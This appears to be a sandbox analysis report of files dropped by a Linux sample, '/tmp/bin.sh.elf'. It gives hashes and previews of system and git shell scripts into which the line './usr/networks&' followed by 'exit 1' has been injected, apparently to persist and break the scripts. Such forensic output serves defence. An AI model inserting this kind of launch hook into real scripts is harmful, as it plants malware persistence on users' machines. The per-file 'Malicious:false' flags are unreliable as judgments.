                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1816
                                                                        Entropy (8bit):4.732022360765176
                                                                        Encrypted:false
                                                                        SSDEEP:48:8MTeMn/zV5rh/1RzUKHjuuOGp2fVU6GjJN+V4ATo+aZ+:heCrhXH+DfVpmhC/
                                                                        MD5:1851CA5690400777129B4D3C6B58D4D2
                                                                        SHA1:5AB880AE743FB6EA929BF372A64B9689BD7D660F
                                                                        SHA-256:75DECCF74010FCBCF95DB88A5885700E743EA339EE2C8DB44D80D97403E30443
                                                                        SHA-512:61986E49AFA511BFA970B3C781B3E7FB2F43546A01B167F45D1769A958A5EEFCEFA37089BD738EDD2BB2BCB1A3C0500FABF49EF39DA5F226A2B5C44698CA52CC
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-support's '/usr/share/acpi-support/policy-funcs' file...getXconsole.PMS="gnome-power-manager kpowersave xfce4-power-manager".PMS="$PMS guidance-power-m
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):309
                                                                        Entropy (8bit):4.972882784760757
                                                                        Encrypted:false
                                                                        SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                                        MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                                        SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                                        SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                                        SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3647
                                                                        Entropy (8bit):4.544491450799858
                                                                        Encrypted:false
                                                                        SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                                        MD5:734F4010B22A9F64DBCCED57155A6396
                                                                        SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                                        SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                                        SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:awk or perl script, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1829
                                                                        Entropy (8bit):4.38604786798686
                                                                        Encrypted:false
                                                                        SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                                        MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                                        SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
                                                                        SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
                                                                        SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):253
                                                                        Entropy (8bit):5.267626424494032
                                                                        Encrypted:false
                                                                        SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                                        MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                                        SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                                        SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                                        SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2988
                                                                        Entropy (8bit):4.924425870820004
                                                                        Encrypted:false
                                                                        SSDEEP:48:II63+FOMuldvJM+6/4p20SdvgT3vtBug0hoAYXy39qbFcxZ+6N77DoXf0iqUckOM:Le+8RldvJjTEvgTftcoAYXY9q6o6N/Ds
                                                                        MD5:7E1F6356EC1ED5353F164A90853F050A
                                                                        SHA1:AEBF6C04E3737D1E1172965E25DB372841DD6550
                                                                        SHA-256:CE3B6AE4E92DA2F30AD1E09DCFA849B2744524D62B9AA9440BA76BEDCA46EE69
                                                                        SHA-512:CCF50021CA3905B5B61C6A2E6D516E21CADEF175D9CD64FD2630E5B185CAE7FF142E8F1793E484981F91F4EEF6C3E053F4D0FD6E9F1F2F9ACFF3B56FB163368E
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir="."..dwz_file="".if $READELF -S "$file" | grep -q " \.gnu_debugaltlink "; then. dwz_file=$($READELF --string-dump=.gnu_debugaltlink "$file" \... | grep -A1 "'\.gnu_debugaltlink':" \... | tail -n +2 \... | sed 's/.*]//'). dwz_file=$(echo $dwz_file). if $READELF -S "$dwz_file" | grep -E -q " \.(gdb_index|debug_names) "; then..# Already has an index, skip it...dwz_file="". fi.fi..set_files ().{. local file="$1".. index4="${file}.gdb-index". index5="${file}.debug_names". debugstr="${file}.debug_str". debugstrmerge="${file}.debug_str.merge". debugstrerr="${file}.debug_str.err".}..tmp_files=.for f in "$file" "$dwz_file"; do. if [ "$f" = "" ]; then..continue. fi. set_files "$f". tmp_files="$tmp_files $index4 $index5 $debugstr $debugstrmerge $debugstrerr".done..rm -f $t
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):486
                                                                        Entropy (8bit):5.198694046664742
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                                        MD5:84511195A8532AFAED8B6E6645B72FC9
                                                                        SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                                        SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                                        SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2904
                                                                        Entropy (8bit):5.006955417229927
                                                                        Encrypted:false
                                                                        SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                                        MD5:E6A74480E370B07D5BDC026A624CE684
                                                                        SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                                        SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                                        SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1246
                                                                        Entropy (8bit):5.049599407603353
                                                                        Encrypted:false
                                                                        SSDEEP:24:MASp8NltrBrTf+mAka+mq8bTNRzbm4XaR3U0Lp0VDbztR5OjPKITbfrCnMSg:MAtltd3dAkad3RzK4Xahjd0VDbZfWDb5
                                                                        MD5:7D6CF34C9799D8C55311F08D93A10138
                                                                        SHA1:A84010E0348E5047DF290518012FC67F16FDE381
                                                                        SHA-256:866FDA21F32F6B7DF370F774EE54E025C366EB13344FEB4171D8B2C7E71390AB
                                                                        SHA-512:9BAF68D66C557B79CEEBD37408E718DCAB9B24DA99D064896200891F56D16A0770F68C202EA169596A319EDAD2CBCD0F7F2CB93A07D20C11D4058F97D733C778
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 0...;;..-o|--overwrite)...overwrite=1...shift...break...;;..--)...shift...break...;;..*)...break...;;..esac.done..# Overwrite or help options are not valid except as first arg.for opt in "$@".do..case "$opt" in..-h|--help)...echo "$USAGE"...exit 0...;;..-o|--overwrite)...echo "$USAGE"...exit 0...;;..esac.done... "$(git --exec-path)/git-sh-setup".require_work_tree.cd_to_toplevel..# Remember original branch.branch=$(git symbolic-ref -q HEAD) ||.original_HEAD=$(git rev-parse --verify HEAD) || {..echo >&2 "Not on any branch and no commit yet?"..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test $overwrite = 1..then...git rerere forget ...fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):16426
                                                                        Entropy (8bit):5.045058479498928
                                                                        Encrypted:false
                                                                        SSDEEP:384:j0fwqnEt0mOR+eFCnerWvDL7gfpv6bck6pYT2t9+WYtrV1achgV3fD0CzIy2FfCr:j0fwqny0mOo8CnerWvH7ghSbckVT2t9n
                                                                        MD5:5FF7690E1044D6F67F7B8D809103162D
                                                                        SHA1:CC0197BA40420DCA0D68647648C2762C1BEF1A16
                                                                        SHA-256:5376C3978C0680B83294F2DBF1341C197B8BCC69A8691413FE8E6F493B5A8380
                                                                        SHA-512:827DA60BFED3EF33E4A24175AD3EB6B58E623B468369C35D5864B407C3F1D0655C942877C997A97D9768EA87B68138D047A4965F1FC66380988BF1A748B5987F
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug () {..if test -n "$debug"..then...printf "%s\n" "$*" >&2..fi.}..say () {..if test -z "$quiet"..then...printf "%s\n" "$*" >&2..fi.}..progress () {..if test -z "$quiet"..then...printf "%s\r" "$*" >&2..fi.}..assert () {..if ! "$@"..then...die "assertion failed: " "$@"..fi.}..ensure_single_rev () {..if test $# -ne 1..then...die "You must provide exactly one revision. Got: '$@'"..fi.}..while test $# -gt 0.do..opt="$1"..shift...case "$opt" in..-q)...quiet=1...;;..-d)...debug=1...;;..--annotate)...annotate="$1"...shift...;;..--no-annotate)...annotate=...;;..-b)...branch="$1"...shift...;;..-P)...prefix="${1%/}"...shift...;;..-m)...message="$1"...shift...;;..--no-prefix)...prefix=...;;..--onto)...onto="$1"...shift...;;..--no-onto)...ont
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):823
                                                                        Entropy (8bit):5.445793673200752
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6vCJsHKfrLCYwTlFfOfSL3DXKUvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+uKKGRBmAF5I0Zl7
                                                                        MD5:4180AD5F33CADD1650F75A8BBC430E64
                                                                        SHA1:E47B7FB6D9AF677D61D983920D8CE0AC76A13DEF
                                                                        SHA-256:3DFF00AAF13758FABB9C97B4E9D26967211B44971056A6BEE5DC0DC04050715F
                                                                        SHA-512:7AB4417B9878A6122942C277D84A5BA1A286819853952614FFE4A9ACEEB00CBFE336AD4EE39946517E430A6C1E415486119733D6C58AD9BA22448CEC9E4766B6
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=$(echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp')..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):8722
                                                                        Entropy (8bit):4.841397056972939
                                                                        Encrypted:false
